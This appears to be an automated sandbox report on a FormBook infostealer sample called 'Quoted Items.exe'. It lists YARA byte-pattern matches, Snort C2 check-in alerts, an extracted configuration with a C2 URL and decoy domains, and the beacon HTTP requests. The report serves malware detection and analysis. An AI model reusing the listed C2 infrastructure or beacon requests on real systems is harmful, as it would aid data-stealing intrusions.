0.2.Quoted Items.exe.41791d0.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x30628:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x309b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3c6c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3c1b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3c7c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3c93f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x313ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3b42c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x32142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x41bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x42c5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Quoted Items.exe.41791d0.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3eae9:$sqlite3step: 68 34 1C 7B E1 0x3ebfc:$sqlite3step: 68 34 1C 7B E1 0x3eb18:$sqlite3text: 68 38 2A 90 C5 0x3ec3d:$sqlite3text: 68 38 2A 90 C5 0x3eb2b:$sqlite3blob: 68 53 D8 7F 8C 0x3ec53:$sqlite3blob: 68 53 D8 7F 8C
4.2.Quoted Items.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.Quoted Items.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Quoted Items.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
4.0.Quoted Items.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.Quoted Items.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.Quoted Items.exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
4.0.Quoted Items.exe.400000.8.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.Quoted Items.exe.400000.8.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.Quoted Items.exe.400000.8.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
0.2.Quoted Items.exe.402a8a0.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Quoted Items.exe.402a8a0.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x39428:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x397b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x61248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x615d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x17ef58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x17f2e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x454c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6d2e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x18aff5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x44fb1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6cdd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18aae1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x455c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6d3e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18b0f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4573f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6d55f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x18b26f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3a1ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x61fea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17fcfa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.Quoted Items.exe.402a8a0.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x478e9:$sqlite3step: 68 34 1C 7B E1 0x479fc:$sqlite3step: 68 34 1C 7B E1 0x6f709:$sqlite3step: 68 34 1C 7B E1 0x6f81c:$sqlite3step: 68 34 1C 7B E1 0x18d419:$sqlite3step: 68 34 1C 7B E1 0x18d52c:$sqlite3step: 68 34 1C 7B E1 0x47918:$sqlite3text: 68 38 2A 90 C5 0x47a3d:$sqlite3text: 68 38 2A 90 C5 0x6f738:$sqlite3text: 68 38 2A 90 C5 0x6f85d:$sqlite3text: 68 38 2A 90 C5 0x18d448:$sqlite3text: 68 38 2A 90 C5 0x18d56d:$sqlite3text: 68 38 2A 90 C5 0x4792b:$sqlite3blob: 68 53 D8 7F 8C 0x47a53:$sqlite3blob: 68 53 D8 7F 8C 0x6f74b:$sqlite3blob: 68 53 D8 7F 8C 0x6f873:$sqlite3blob: 68 53 D8 7F 8C 0x18d45b:$sqlite3blob: 68 53 D8 7F 8C 0x18d583:$sqlite3blob: 68 53 D8 7F 8C
0.2.Quoted Items.exe.2fc435c.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Quoted Items.exe.2fc435c.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x34a3a6:$v1: SbieDll.dll 0x34a3c0:$v2: USER 0x34a3cc:$v3: SANDBOX 0x34a3de:$v4: VIRUS 0x34a42e:$v4: VIRUS 0x34a3ec:$v5: MALWARE 0x34a3fe:$v6: SCHMIDTI 0x34a412:$v7: CURRENTUSER
0.2.Quoted Items.exe.2fd9a34.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Quoted Items.exe.2fd9a34.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x334cce:$v1: SbieDll.dll 0x334ce8:$v2: USER 0x334cf4:$v3: SANDBOX 0x334d06:$v4: VIRUS 0x334d56:$v4: VIRUS 0x334d14:$v5: MALWARE 0x334d26:$v6: SCHMIDTI 0x334d3a:$v7: CURRENTUSER
0.2.Quoted Items.exe.2fcd7e8.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Quoted Items.exe.2fcd7e8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x340f1a:$v1: SbieDll.dll 0x340f34:$v2: USER 0x340f40:$v3: SANDBOX 0x340f52:$v4: VIRUS 0x340fa2:$v4: VIRUS 0x340f60:$v5: MALWARE 0x340f72:$v6: SCHMIDTI 0x340f86:$v7: CURRENTUSER
Click to see the 28 entries

Snort Signatures

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851518532023883 05/14/22-13:13:06.533808
SID:	2023883
Source Port:	51518
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 209.17.116.163

Timestamp:	192.168.2.3209.17.116.16349806802031412 05/14/22-13:12:56.292892
SID:	2031412
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 209.17.116.163

Timestamp:	192.168.2.3209.17.116.16349806802031449 05/14/22-13:12:56.292892
SID:	2031449
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 209.17.116.163

Timestamp:	192.168.2.3209.17.116.16349806802031453 05/14/22-13:12:56.292892
SID:	2031453
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.gulabmonga.com/gfge/"], "decoy": ["loopcoalition.com", "hd126.com", "elioguion.net", "defitrader.academy", "exactemi.com", "angeloacierno.com", "range4tis.com", "ilovekuduro.us", "mydealsstation.com", "jerichoprinting.com", "birdcafe605.com", "freemansrepublic.com", "driedplasma.com", "valuableconnect.com", "anthonyvid.xyz", "theydo.support", "devnetsecops.com", "cryptork.tech", "ufheur678.store", "lavenderspa586.com", "scandicinvestmentholding.com", "youenfangtex.com", "gratefulgrandmas.com", "ampersandtalent.net", "wippychick.com", "stamping.digital", "trixes.net", "popinticket.com", "ivyleaguereading.com", "killerinktnpasumo3.xyz", "greatyuwx.com", "royaltortoisecookieco.online", "quinten-and-sam.com", "mobile-sh.com", "reacjs.com", "hongbufang.net", "winemenuimports.com", "nashuatelegrpah.com", "nicorgaa.com", "outlanfd.com", "personalitideal.com", "mhhj666.com", "themethodcollective.com", "36536a.com", "bijit.xyz", "yoursinsoccer.net", "cryptoducks.club", "defuw.com", "kangley.net", "hacvm.com", "zhouyihong.top", "takut5.com", "kreditnekarticers.com", "koigo-wp.com", "52byhx.com", "phaghpanah.com", "apqlds.com", "karxsba2ix.xyz", "demasinfimo.quest", "unitytrstbnk.com", "panasonic-hcm.com", "27530amethystway.com", "idealftz.xyz", "conventionline.com"]}

Multi AV Scanner detection for submitted file

Source: Quoted Items.exe	Virustotal: Detection: 44%			Perma Link
Source: Quoted Items.exe	ReversingLabs: Detection: 48%

Yara detected FormBook

Source: Yara match	File source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.gratefulgrandmas.com/gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p	Avira URL Cloud: Label: malware
Source: www.gulabmonga.com/gfge/	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: Quoted Items.exe

Joe Sandbox ML: detected

Source: 4.0.Quoted Items.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.Quoted Items.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.Quoted Items.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.Quoted Items.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: Quoted Items.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: Quoted Items.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: AuthorizationRuleCollect.pdb source: Quoted Items.exe
Source:	Binary string: wntdll.pdbUGP source: Quoted Items.exe, 00000004.00000003.279757387.0000000000E29000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351539993.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000003.285678625.0000000000FCC000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.351171334.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.352532340.0000000004F11000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Quoted Items.exe, 00000004.00000003.279757387.0000000000E29000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351539993.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000003.285678625.0000000000FCC000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000010.00000003.351171334.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.352532340.0000000004F11000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4x nop then pop edi	4_2_0040C3D8
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4x nop then pop edi	4_2_00415652
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop edi	16_2_00DBC3D8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop edi	16_2_00DC5652

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.zhouyihong.top
Source: C:\Windows\explorer.exe	Network Connect: 180.76.158.103 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.gratefulgrandmas.com
Source: C:\Windows\explorer.exe	Domain query: www.royaltortoisecookieco.online
Source: C:\Windows\explorer.exe	Network Connect: 172.217.168.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 209.17.116.163 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49806 -> 209.17.116.163:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49806 -> 209.17.116.163:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49806 -> 209.17.116.163:80
Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51518 -> 8.8.8.8:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.gulabmonga.com/gfge/

Source: Joe Sandbox View	ASN Name: BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd
Source: Joe Sandbox View	ASN Name: DEFENSE-NETUS DEFENSE-NETUS

Source: global traffic	HTTP traffic detected: GET /gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk HTTP/1.1Host: www.royaltortoisecookieco.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p HTTP/1.1Host: www.gratefulgrandmas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 209.17.116.163 209.17.116.163

Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmstp.exe, 00000010.00000002.515589194.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515718507.00000000033FF000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515691938.00000000033F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zhouyihong.top/gfge/?-ZEhG=0pO83p&atm=sEHQRf3BqyQO1Td3JS1wynh19DI9TXEUdP6kOjRf7qywa0JEaIf
Source: cmstp.exe, 00000010.00000002.517155525.0000000005762000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.gratitudeaddict.com/

Source: unknown

DNS traffic detected: queries for: www.royaltortoisecookieco.online

Source: global traffic	HTTP traffic detected: GET /gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk HTTP/1.1Host: www.royaltortoisecookieco.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p HTTP/1.1Host: www.gratefulgrandmas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
